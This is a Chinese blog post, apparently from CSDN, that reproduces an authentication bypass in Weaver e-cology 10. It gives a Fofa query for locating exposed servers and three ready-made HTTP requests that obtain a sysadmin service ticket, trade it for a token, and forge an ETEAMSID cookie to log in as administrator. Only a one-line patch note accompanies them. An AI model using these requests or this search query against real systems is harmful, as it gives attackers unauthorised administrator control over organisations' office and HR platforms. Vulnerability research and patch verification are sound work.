泛微e-cology10 appThirdLogin 权限绕过漏洞

于 2024-08-31 15:41:15 发布
阅读量225 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141753455
版权

0x01 漏洞描述:

泛微Ecology-10.0存在权限绕过漏洞,该漏洞通过Ecology-10.0获取管理员访问令牌,然后通过伪造cookie使用授权的令牌进行登陆,登录后可使用系统管理员权限进行操作。

0x02 影响版本:

e-cology10

0x03 搜索语句:

Fofa:body="/build/passport/static/js/lib.js" || body="/build/ecodesdk/static/js/lib.js" || icon_hash="-1619753057"

0x04 漏洞复现:

step1 使用/papi/passport/rest/appThirdLogin接口获取服务器认证票据

POST /papi/passport/rest/appThirdLogin HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

username=sysadmin&service=1&ip=1&loginType=third

step2 利用/papi/passport/login/generateEteamsId接口与step1获取的serviceTicketId进行请求伪造,获取登录认证token

POST /papi/passport/login/generateEteamsId HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

stTicket=step1获取的serviceTicketId

step3 访问/hrm/addressbook/department接口 并在请求中伪造cookie增加ETEAMSID字段,同时赋值ETEAMSID值为step2中的data数据及如下数据:

ETEAMSID=THIRD_f2c36dc9b42ca9ddb4c56dxxxxxxxx

 0x05 修复建议:

官方已针对漏洞发布补丁,访问官方并及时修复:

泛微全程数字化解决方案,助力组织数字化转型落地

iSee857
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】泛微 e-cology v10.0 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
08-23 161
泛微e-cology是一套功能丰富的协同管理应用平台,集成了企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理等多项功能。该漏洞通过Ecology-10.0获取管理员访问令牌,然后通过JDBC反序列化和实现RCE,系统依赖于H2 数据库。
Goby 漏洞发布|泛微 e-cology v10 appThirdLogin 权限绕过漏洞【已复现】
m0_46699477的博客
08-21 400
泛微 e-cology v10 appThirdLogin 权限绕过漏洞:其appThirdLogin接口及后续接口,存在Cookie伪造漏洞,未经授权的攻击者可以伪造Cookie,进行Cookie的相关利用,获取账户密码,登录后台,从而造成危害
泛微 e-cology v10 远程代码执行漏洞
棉花糖的博客
08-20 1472
泛微新一代数字化运营构建平台E10(e-cology10、eteams10),是基于原eteams平台之上全新研发,同时融合了原E9产品的所有功能,最终研发出全新平台。
0day 泛微e-cology v10远程代码执行漏洞
weixin_43167326的博客
08-20 767
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
漏洞复现】泛微E-Cology9 WorkPlanService 前台SQL注入
今天是几号的博客
07-29 794
泛微E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
泛微E-cology8管理员后端维护手册全套
09-30
泛微E-cology8是一款企业级的协同办公自动化(OA)系统,专为现代企业管理设计,提供全面的后端维护支持。这套“泛微E-cology8管理员后端维护手册全套”涵盖了OA系统中所有后端模块的详细操作和维护指南,旨在帮助...
泛微E-cology 二次开发Java Jar包
04-11
泛微E-cology是一款企业级协同办公软件,其二次开发功能允许用户根据自身业务需求定制化系统,以满足更深层次的管理与协作需求。在Java环境下进行泛微E-cology的二次开发,开发者通常需要使用到相关的jar包,这些jar...
(泛微e-cology7.0)数据库表结构设计文档
11-05
泛微e-cology7.0数据库表结构设计文档 泛微e-cology7.0数据库表结构设计文档是泛微网络有限公司开发的OA系统的数据库设计文档。该文档对泛微e-cology7.0系统中的所有表结构进行了详细的设计和描述。 一、基础表 ...
泛微E-cology8.0后台维护手册-PDF版.zip
02-09
泛微协同办公平台E-cology8.0版本后台维护手册(0)--组织权限中心 泛微协同办公平台E-cology8.0版本后台维护手册(1)--流程引擎 泛微协同办公平台E-cology8.0版本后台维护手册(2)--内容引擎 泛微协同办公平台E-...
[图解]SysML和EA建模住宅安全系统-活动作为块
rolt的专栏
08-30 854
然后看它们之间的各种各样的依赖关系
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 973
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
【网络安全】网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 369
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
Web3开发与安全:6个月高效学习路径
最新发布
weixin_47075747的博客
08-30 559
这份计划应该能帮助你系统地学习智能合约开发和安全审计技能,同时克服英语的障碍。
需方软件供应链安全保障要求及开源场景对照自评表(上)
LJQClqjc的博客
08-27 227
开源软件供应链作为软件供应链的一种特殊形式,该国标亦适用于指导开源软件供应链中的供需双方开展组织管理和供应活动管理,增强开源软件供应链组织管理和供应活动管理能力,防范供应链导致的开源软件产品及其生命周期中断类的供应关系风险,防止供应活动在开源软件及其生命周期服务中引入新的技术安全风险和知识产权风险(例如:防止供应活动引入的软件漏洞、后门、篡改、伪造、许可协议不合规等),保障业务持续稳定安全运行。以下根据我们的分析研究,对国标中与开源供应链安全直接相关的内容进行识别与分析,供业内参考。
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 344
SaveButton 安全控件说明
等保测评中的安全测试方法
w13359990065的博客
08-26 734
通过物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评等多层次的综合评估,可以有效识别系统中的安全隐患,提升信息系统的整体安全防护能力,满足国家相关法律法规的要求,助力企业提升行业竞争力。在等保测评中,安全测试方法的有效实施离不开专业的测评团队和科学的测评流程。测评团队需具备丰富的安全测试经验和专业知识,能够准确识别系统中的安全风险并提出切实可行的整改建议。首先,等保测评中的安全测试方法涵盖了多个层面,包括但不限于物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评。
钓鱼特辑(四)安全较量,摆脱“麻瓜”标签
Eaglecloud的博客
08-30 410
近期,某知名制造业企业HR又收到了来自红队“求职者”的简历,显示名为「陈梓锋-华南理工大学-硕士」的压缩文件,立马被亿格云枢EDR检测到并触发告警,企业安全团队在亿格云安全团队的介入下,及时剖析并处置了本次钓鱼攻击,经分析,本次钓鱼攻击使用了多款远控C2,规避调试器、规避内存扫描等,对抗技术丰富。另一种是在本身的shellcode内就实现了加解密。,有效应对大部分旨在规避传统安全检测的攻击,构建了一个多维度的检测与响应机制,从而为企业筑起了一道坚固的防线,抵御钓鱼攻击等网络安全威胁,保护企业数据和资产。
等保2.0通用部分 | 安全物理环境(三级)测评指导书
2401_84434570的博客
08-30 436
应核查机房是否不位于所在建筑的顶层或地下室,如果否,则核查机房是否采取了防水和防潮措施。a)机房应设置火灾自动消防系统,能够自动检测火情、自动报警,并自动灭火;应设置温湿度自动调节设施,使机房温湿度的变化在设备运行所允许的范围之内。2、应核查机房内设备或主要部件上是否设置了明显且不易除去的标识。2、应核查机房内是否采取了排泄地下积水,防止地下积水渗透的措施。a)应将设备或主要部件进行加固,并设置明显的不易除去的标识;c)应设置机房防盗报警系统或设置有专人值守的视频监控系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值